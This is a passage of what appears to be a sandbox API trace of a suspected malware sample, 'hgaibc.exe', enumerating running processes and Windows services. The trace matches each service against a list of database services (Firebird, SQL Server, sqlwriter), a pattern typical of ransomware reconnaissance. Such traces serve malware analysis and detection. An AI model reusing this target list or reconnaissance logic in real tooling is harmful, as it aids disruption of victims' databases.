lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0191.333] lstrlenW (lpString="spoolsv.exe") returned 11 [0191.333] Process32NextW (in: hSnapshot=0x358, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x680, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0191.334] lstrlenW (lpString="svchost.exe") returned 11 [0191.334] Process32NextW (in: hSnapshot=0x358, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x4b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0191.335] lstrlenW (lpString="audiodg.exe") returned 11 [0191.335] Process32NextW (in: hSnapshot=0x358, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x714, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0191.335] lstrlenW (lpString="OfficeClickToRun.exe") returned 20 [0191.336] Process32NextW (in: hSnapshot=0x358, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x754, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="SecurityHealthService.exe")) returned 1 [0191.336] lstrlenW (lpString="SecurityHealthService.exe") returned 25 [0191.336] Process32NextW (in: hSnapshot=0x358, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x4, pcPriClassBase=8, dwFlags=0x0, szExeFile="Memory Compression")) returned 1 [0191.337] lstrlenW (lpString="Memory Compression") returned 18 [0191.337] Process32NextW (in: hSnapshot=0x358, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x854, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x3bc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0191.338] lstrlenW (lpString="sihost.exe") returned 10 [0191.338] Process32NextW (in: hSnapshot=0x358, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0191.339] lstrlenW (lpString="svchost.exe") returned 11 [0191.339] Process32NextW (in: hSnapshot=0x358, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x3bc, pcPriClassBase=6, dwFlags=0x0, szExeFile="msoia.exe")) returned 1 [0191.339] lstrlenW (lpString="msoia.exe") returned 9 [0191.339] Process32NextW (in: hSnapshot=0x358, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x3bc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0191.340] lstrlenW (lpString="taskhostw.exe") returned 13 [0191.340] Process32NextW (in: hSnapshot=0x358, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3e, th32ParentProcessID=0x9c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0191.341] lstrlenW (lpString="explorer.exe") returned 12 [0191.341] Process32NextW (in: hSnapshot=0x358, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x2c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0191.342] lstrlenW (lpString="SearchUI.exe") returned 12 [0191.342] Process32NextW (in: hSnapshot=0x358, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x2c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0191.342] lstrlenW (lpString="ShellExperienceHost.exe") returned 23 [0191.343] Process32NextW (in: hSnapshot=0x358, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0191.343] lstrlenW (lpString="RuntimeBroker.exe") returned 17 [0191.343] Process32NextW (in: hSnapshot=0x358, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xca0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x2c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0191.344] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0191.344] Process32NextW (in: hSnapshot=0x358, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0xe24, pcPriClassBase=8, dwFlags=0x0, szExeFile="hgaibc.exe")) returned 1 [0191.345] lstrlenW (lpString="hgaibc.exe") returned 10 [0191.345] Process32NextW (in: hSnapshot=0x358, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0xe24, pcPriClassBase=8, dwFlags=0x0, szExeFile="hgaibc.exe")) returned 0 [0191.346] CloseHandle (hObject=0x358) returned 1 [0191.346] Sleep (dwMilliseconds=0x1f4) [0191.860] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x6bed90 [0191.861] EnumServicesStatusExW (in: hSCManager=0x6bed90, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x245ff3c, lpServicesReturned=0x245ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x245ff3c, lpServicesReturned=0x245ff54, lpResumeHandle=0x0) returned 0 [0191.861] GetLastError () returned 0xea [0191.861] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1c30) returned 0x6d87a0 [0191.861] EnumServicesStatusExW (in: hSCManager=0x6bed90, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x6d87a0, cbBufSize=0x1c30, pcbBytesNeeded=0x245ff3c, lpServicesReturned=0x245ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x6d87a0, pcbBytesNeeded=0x245ff3c, lpServicesReturned=0x245ff54, lpResumeHandle=0x0) returned 1 [0191.862] CloseServiceHandle (hSCObject=0x6bed90) returned 1 [0191.862] lstrlenW (lpString="Appinfo") returned 7 [0191.862] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1 [0191.862] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1 [0191.862] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1 [0191.862] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1 [0191.862] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1 [0191.862] lstrlenW (lpString="AppXSvc") returned 7 [0191.862] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AppXSvc") returned 1 [0191.862] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AppXSvc") returned 1 [0191.862] lstrcmpiW (lpString1="sqlwriter", lpString2="AppXSvc") returned 1 [0191.862] lstrcmpiW (lpString1="mssqlserver", lpString2="AppXSvc") returned 1 [0191.863] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AppXSvc") returned 1 [0191.863] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0191.863] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0191.863] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0191.863] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0191.863] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0191.863] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0191.863] lstrlenW (lpString="Audiosrv") returned 8 [0191.863] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Audiosrv") returned 1 [0191.863] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Audiosrv") returned 1 [0191.863] lstrcmpiW (lpString1="sqlwriter", lpString2="Audiosrv") returned 1 [0191.863] lstrcmpiW (lpString1="mssqlserver", lpString2="Audiosrv") returned 1 [0191.863] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Audiosrv") returned 1 [0191.863] lstrlenW (lpString="BFE") returned 3 [0191.863] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0191.863] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0191.863] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0191.863] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0191.863] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0191.863] lstrlenW (lpString="BrokerInfrastructure") returned 20 [0191.863] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0191.863] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0191.863] lstrcmpiW (lpString1="sqlwriter", lpString2="BrokerInfrastructure") returned 1 [0191.863] lstrcmpiW (lpString1="mssqlserver", lpString2="BrokerInfrastructure") returned 1 [0191.863] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BrokerInfrastructure") returned 1 [0191.863] lstrlenW (lpString="CDPSvc") returned 6 [0191.863] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CDPSvc") returned 1 [0191.864] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CDPSvc") returned 1 [0191.864] lstrcmpiW (lpString1="sqlwriter", lpString2="CDPSvc") returned 1 [0191.864] lstrcmpiW (lpString1="mssqlserver", lpString2="CDPSvc") returned 1 [0191.864] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CDPSvc") returned 1 [0191.864] lstrlenW (lpString="ClickToRunSvc") returned 13 [0191.864] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0191.864] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0191.864] lstrcmpiW (lpString1="sqlwriter", lpString2="ClickToRunSvc") returned 1 [0191.864] lstrcmpiW (lpString1="mssqlserver", lpString2="ClickToRunSvc") returned 1 [0191.864] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ClickToRunSvc") returned 1 [0191.864] lstrlenW (lpString="CoreMessagingRegistrar") returned 22 [0191.864] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0191.864] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0191.864] lstrcmpiW (lpString1="sqlwriter", lpString2="CoreMessagingRegistrar") returned 1 [0191.864] lstrcmpiW (lpString1="mssqlserver", lpString2="CoreMessagingRegistrar") returned 1 [0191.864] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CoreMessagingRegistrar") returned 1 [0191.864] lstrlenW (lpString="CryptSvc") returned 8 [0191.864] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0191.864] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0191.864] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0191.864] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0191.864] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0191.864] lstrlenW (lpString="DcomLaunch") returned 10 [0191.864] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0191.864] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0191.864] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0191.864] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0191.864] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0191.865] lstrlenW (lpString="DeviceAssociationService") returned 24 [0191.865] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0191.865] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0191.865] lstrcmpiW (lpString1="sqlwriter", lpString2="DeviceAssociationService") returned 1 [0191.865] lstrcmpiW (lpString1="mssqlserver", lpString2="DeviceAssociationService") returned 1 [0191.865] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DeviceAssociationService") returned 1 [0191.865] lstrlenW (lpString="Dhcp") returned 4 [0191.865] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0191.865] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0191.865] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0191.865] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0191.865] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0191.865] lstrlenW (lpString="Dnscache") returned 8 [0191.865] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0191.865] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0191.865] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0191.865] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0191.865] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0191.865] lstrlenW (lpString="DPS") returned 3 [0191.865] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0191.865] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0191.865] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0191.865] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0191.865] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0191.865] lstrlenW (lpString="DusmSvc") returned 7 [0191.865] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DusmSvc") returned 1 [0191.865] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DusmSvc") returned 1 [0191.865] lstrcmpiW (lpString1="sqlwriter", lpString2="DusmSvc") returned 1 [0191.865] lstrcmpiW (lpString1="mssqlserver", lpString2="DusmSvc") returned 1 [0191.866] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DusmSvc") returned 1 [0191.866] lstrlenW (lpString="EventLog") returned 8 [0191.866] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventLog") returned 1 [0191.866] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventLog") returned 1 [0191.866] lstrcmpiW (lpString1="sqlwriter", lpString2="EventLog") returned 1 [0191.866] lstrcmpiW (lpString1="mssqlserver", lpString2="EventLog") returned 1 [0191.866] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventLog") returned 1 [0191.866] lstrlenW (lpString="EventSystem") returned 11 [0191.866] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0191.866] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0191.866] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0191.866] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0191.866] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0191.866] lstrlenW (lpString="FontCache") returned 9 [0191.866] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="FontCache") returned -1 [0191.866] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="FontCache") returned -1 [0191.866] lstrcmpiW (lpString1="sqlwriter", lpString2="FontCache") returned 1 [0191.866] lstrcmpiW (lpString1="mssqlserver", lpString2="FontCache") returned 1 [0191.866] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="FontCache") returned 1 [0191.866] lstrlenW (lpString="gpsvc") returned 5 [0191.866] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0191.866] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0191.866] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0191.866] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0191.866] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0191.866] lstrlenW (lpString="iphlpsvc") returned 8 [0191.866] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0191.866] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0191.866] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0191.867] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0191.867] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0191.867] lstrlenW (lpString="KeyIso") returned 6 [0191.867] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="KeyIso") returned -1 [0191.867] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="KeyIso") returned -1 [0191.867] lstrcmpiW (lpString1="sqlwriter", lpString2="KeyIso") returned 1 [0191.867] lstrcmpiW (lpString1="mssqlserver", lpString2="KeyIso") returned 1 [0191.867] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="KeyIso") returned 1 [0191.867] lstrlenW (lpString="LanmanServer") returned 12 [0191.867] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0191.867] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0191.867] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0191.867] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0191.867] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0191.867] lstrlenW (lpString="LanmanWorkstation") returned 17 [0191.867] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0191.867] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0191.867] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0191.867] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0191.867] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0191.867] lstrlenW (lpString="lfsvc") returned 5 [0191.867] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lfsvc") returned -1 [0191.867] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lfsvc") returned -1 [0191.867] lstrcmpiW (lpString1="sqlwriter", lpString2="lfsvc") returned 1 [0191.867] lstrcmpiW (lpString1="mssqlserver", lpString2="lfsvc") returned 1 [0191.867] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lfsvc") returned 1 [0191.867] lstrlenW (lpString="lmhosts") returned 7 [0191.867] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0191.868] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0191.868] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0191.868] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0191.868] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0191.868] lstrlenW (lpString="LSM") returned 3 [0191.868] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LSM") returned -1 [0191.868] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LSM") returned -1 [0191.868] lstrcmpiW (lpString1="sqlwriter", lpString2="LSM") returned 1 [0191.868] lstrcmpiW (lpString1="mssqlserver", lpString2="LSM") returned 1 [0191.868] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LSM") returned 1 [0191.868] lstrlenW (lpString="MpsSvc") returned 6 [0191.868] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0191.868] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0191.868] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0191.868] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0191.868] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0191.868] lstrlenW (lpString="NcbService") returned 10 [0191.868] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NcbService") returned -1 [0191.868] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NcbService") returned -1 [0191.868] lstrcmpiW (lpString1="sqlwriter", lpString2="NcbService") returned 1 [0191.868] lstrcmpiW (lpString1="mssqlserver", lpString2="NcbService") returned -1 [0191.868] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NcbService") returned 1 [0191.868] lstrlenW (lpString="netprofm") returned 8 [0191.868] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0191.868] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0191.868] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0191.868] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0191.869] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0191.869] lstrlenW (lpString="NgcSvc") returned 6 [0191.869] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NgcSvc") returned -1 [0191.869] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NgcSvc") returned -1 [0191.869] lstrcmpiW (lpString1="sqlwriter", lpString2="NgcSvc") returned 1 [0191.869] lstrcmpiW (lpString1="mssqlserver", lpString2="NgcSvc") returned -1 [0191.869] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NgcSvc") returned 1 [0191.869] lstrlenW (lpString="NlaSvc") returned 6 [0191.869] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0191.869] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0191.869] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0191.869] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0191.869] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0191.869] lstrlenW (lpString="nsi") returned 3 [0191.869] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0191.869] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0191.869] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0191.869] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0191.869] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0191.869] lstrlenW (lpString="PcaSvc") returned 6 [0191.869] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0191.869] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0191.869] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0191.869] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0191.869] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0191.869] lstrlenW (lpString="PlugPlay") returned 8 [0191.869] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0191.869] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0191.869] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0191.870] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0191.870] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0191.870] lstrlenW (lpString="Power") returned 5 [0191.870] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0191.870] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0191.870] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0191.870] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0191.870] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0191.870] lstrlenW (lpString="ProfSvc") returned 7 [0191.870] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0191.870] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0191.870] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0191.870] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0191.870] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0191.870] lstrlenW (lpString="RpcEptMapper") returned 12 [0191.870] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0191.870] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0191.870] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0191.870] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0191.870] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0191.870] lstrlenW (lpString="RpcSs") returned 5 [0191.870] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0191.870] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0191.870] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0191.870] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0191.870] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0191.870] lstrlenW (lpString="SamSs") returned 5 [0191.870] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0191.871] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0191.871] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0191.871] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0191.871] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0191.871] lstrlenW (lpString="Schedule") returned 8 [0191.871] lstrcmpiW 